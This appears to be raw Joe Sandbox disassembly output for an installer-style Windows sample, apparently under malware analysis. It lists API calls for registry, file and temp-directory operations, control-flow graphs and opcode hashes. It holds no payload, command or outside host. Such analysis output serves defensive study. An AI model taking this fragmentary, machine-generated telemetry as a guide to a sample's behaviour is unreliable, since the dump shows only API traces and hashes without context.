                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1495540970-0
                                                                                                                                                                                                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 518 40689a-4068ba GetSystemDirectoryW 519 4068bc 518->519 520 4068be-4068c0 518->520 519->520 521 4068d1-4068d3 520->521 522 4068c2-4068cb 520->522 524 4068d4-406907 wsprintfW LoadLibraryExW 521->524 522->521 523 4068cd-4068cf 522->523 523->524
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 525 40605c-406068 526 406069-40609d GetTickCount GetTempFileNameW 525->526 527 4060ac-4060ae 526->527 528 40609f-4060a1 526->528 530 4060a6-4060a9 527->530 528->526 529 4060a3 528->529 529->530
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                • API String ID: 1716503409-944333549
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 531 4015c1-4015d5 call 402da6 call 405eb7 536 401631-401634 531->536 537 4015d7-4015ea call 405e39 531->537 539 401663-4022f6 call 401423 536->539 540 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 536->540 545 401604-401607 call 405aeb 537->545 546 4015ec-4015ef 537->546 552 402c2a-402c39 539->552 540->552 558 40165b-40165e 540->558 555 40160c-40160e 545->555 546->545 549 4015f1-4015f8 call 405b08 546->549 549->545 564 4015fa-401602 call 405a6e 549->564 559 401610-401615 555->559 560 401627-40162f 555->560 558->552 561 401624 559->561 562 401617-401622 GetFileAttributesW 559->562 560->536 560->537 561->560 562->560 562->561 564->555
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 1892508949-670666241
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 567 40248a-4024bb call 402da6 * 2 call 402e36 574 4024c1-4024cb 567->574 575 402c2a-402c39 567->575 577 4024cd-4024da call 402da6 lstrlenW 574->577 578 4024de-4024e1 574->578 577->578 581 4024e3-4024f4 call 402d84 578->581 582 4024f5-4024f8 578->582 581->582 583 402509-40251d RegSetValueExW 582->583 584 4024fa-402504 call 4032b4 582->584 588 402522-402603 RegCloseKey 583->588 589 40251f 583->589 584->583 588->575 592 40292e-402935 588->592 589->588 592->575
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0040B5F0,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2655323295-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 593 40259e-4025ba call 402de6 call 402d84 598 4025c0-4025cb 593->598 599 40292e-402935 593->599 601 4025d9-4025ec RegEnumValueW 598->601 602 4025cd-4025d7 RegEnumKeyW 598->602 600 402c2a-402c39 599->600 604 4025f5-402603 RegCloseKey 601->604 605 4025ee 601->605 602->604 604->599 604->600 605->604
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                                                                                                • Opcode ID: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 609 405c01-405c12 call 406008 612 405c42 609->612 613 405c14-405c1a 609->613 614 405c44-405c46 612->614 615 405c24 DeleteFileW 613->615 616 405c1c-405c22 RemoveDirectoryW 613->616 617 405c2a-405c2c 615->617 616->617 618 405c33-405c38 617->618 619 405c2e-405c31 617->619 618->612 620 405c3a-405c3c SetFileAttributesW 618->620 619->614 620->612
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                  • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DE3), ref: 00405C1C
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405C3C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1655745494-0
                                                                                                                                                                                                                                • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 621 40252a-402542 call 402de6 call 402da6 626 402548-402566 RegQueryValueExW 621->626 627 40292e-402935 621->627 628 402596-40259c 626->628 629 402568-40256c 626->629 630 402c2a-402c39 627->630 634 4025fc-402603 RegCloseKey 628->634 631 402581-402594 call 406484 629->631 632 40256e-402571 629->632 631->634 635 402573-402577 632->635 636 402579-4025f5 632->636 634->627 634->630 635->628 635->636 636->634
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                                • Opcode ID: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 642 401389-40138e 643 4013fa-4013fc 642->643 644 401390-4013a0 643->644 645 4013fe 643->645 644->645 646 4013a2-4013ad call 401434 644->646 647 401400-401401 645->647 650 401404-401409 646->650 651 4013af-4013b7 call 40136d 646->651 650->647 654 4013b9-4013bb 651->654 655 4013bd-4013c2 651->655 656 4013c4-4013c9 654->656 655->656 656->643 657 4013cb-4013f4 MulDiv SendMessageW 656->657 657->643
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405682
                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000,?,00000000,?), ref: 004056CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2896919175-0
                                                                                                                                                                                                                                • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                                                                                                                                                                                                • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C248,?,?,00406438,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?), ref: 004063CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                                                                                                                                Uniqueness

